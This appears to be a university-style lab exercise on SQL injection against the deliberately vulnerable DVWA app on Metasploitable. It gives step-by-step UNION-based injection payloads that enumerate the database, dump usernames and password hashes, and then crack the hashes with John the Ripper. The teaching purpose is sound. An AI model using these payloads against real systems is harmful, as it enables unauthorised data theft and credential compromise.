SQL Injection

Prerequisites:

  1. Kali Linux access, either through a virtual machine or through a friend.
  2. Fresh Metasploitable Virtual Machine

Objectives:
The main purpose of this week’s exercise is to learn how to exploit SQL injection and other web-based
vulnerabilities.

Resources:
https://www3.ntu.edu.sg/home/ehchua/programming/sql/MySQL_Beginner.html

Call for Help:
Do your best to try the tasks below, if you’re confused, or need help, feel free to email or text me at any
point and I will gladly try to help you. If you’re having an Issue, chances are, other people are as well,
and I can update the instructions/comments/add content as necessary.

Tasks:

Setup

  1. You’ll need both Kali and Metasploitable Running simultaneously. You can do this by running a
    virtual machine, or by pairing with a friend and running Metasploitable over the network (be
    careful here).
  2. Make sure you follow the instructions from lecture, and ensure the networks are setup
    accordingly with your layout.

Intro:

  1. Refamiliarize yourself with the following sections from Offensive Security’s Website
    a. Introduction
    b. Metasploit Fundamentals
    c. Information Gathering
    https://www.offensive-security.com/metasploit-unleashed/
  2. Remember, your Kali virtual machine, and Metasploitable virtual machines can easily be
    redownloaded if you encounter an error. Don’t be afraid to experiment.
  3. Careful on your apostrophe!
    https://www.cl.cam.ac.uk/~mgk25/ucs/quotes.html
    Setup:
  4. Startup both Kali and Metasploitable
  5. Find the IP address of the Metasploitable Virtual machine and point your Kali virtual machine to
    it via Firefox (http://IP). You should be presented with the following (or similar) screen
  6. Click the DVWA link, and enter the username and password as admin and password
  7. Click on the DVWA Security Button, and set the security level to “Low”
    SQL Injection:
  8. Basic Injection
    a. Click the SQL injection button.
    b. Enter “1” into the input box and click Submit.
    c. Note: The website is purposely designed to print the user ID, First Name and Surname
    to the screen.
    d. The actual Query that is executed is:
    $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id'”;

e. Note the Web Browser URL and the token that is passed to the URL.
Experiment with the URL, are you able to get other username/password combinations?
If so, provide a screenshot.

  1. Always True Case
    a. Input the below text into the User ID Textbox.
    %’ or ‘0’=’0
    b. Click Submit
    c. In this case where we are modifying a SQL query as it’s processing to append the text we
    entered in the field to display all the records that are false and all the records that are
    true.
    %’ – Will probably not be equal to anything, and will be false.
    ‘0’=’0’ – Is equal to true, because 0 will always equal 0.
    mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0’;
  2. Display Database Version
    a. Input the below text into the User ID Textbox
    %’ or 0=0 union select null, version() #
    Submit a screenshot, what is the version of the database? Is the version of the database any
    help to an attacker? What could be done this information?
  3. Display the Database User
    a. Input the below text into the User ID Textbox.
    %’ or 0=0 union select null, user() #
    Submit a screenshot, what user is running the query?
    Review: http://www.hexatier.com/mysql-database-security-best-practices-2/ and our lecture
    content.
    What would you recommend to fix/mitigate or monitor these issues?
  4. Display the Database Name
    a. Input the below text into the User ID Textbox.
    b. %’ or 0=0 union select null, database() #
  5. Database Exploration
    a. There is a database called information_schema that stores information about other
    databases. We will use this to our advantage to explore other tables.
    b. Input the below text into the User ID Textbox.
    %’ and 1=0 union select null, table_name from information_schema.tables #
    Provide a list of a few table names that you found.
    c. Let’s explore the user table to understand its structure.
    d. Input the below text into the User ID Textbox.
    %’ and 1=0 union select null, concat(table_name,0x0a,column_name) from
    information_schema.columns where table_name = ‘users’ #
    What columns are in the users table?
    e. Let’s show all the content in the user table.
    Input the below text into the User ID Textbox.
    %’ and 1=0 union select null,
    concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  6. Find the passwords:
    a. Let’s create a password hash file from these results.
    b. Copy the username and password into notepad in kali in the format username:hash
    c. Save the file to a memorable location.
    d. Open a terminal run the file against john the ripper. You’ll need to run the commands
    sequentially.
    john –format=raw-MD5 <YourFilename>
    john –format=raw-MD5 –show <YourFilename>

Produce a list of all the passwords.

  1. Find where the database is stored:
    a. Input the below text into the User ID Textbox.
    ‘ union select null,@@datadir #
    Where is the database stored? Is this useful?

Advanced Tutorials (Recommended but not required):

Burpsuite:
https://tinyurl.com/ycoyzzms
https://tinyurl.com/y9a2rcs3

Mutillidae:
https://www.youtube.com/watch?v=rNkR1Joz4eU

Open chat
Hello 👋.
Tell me, how can I help you?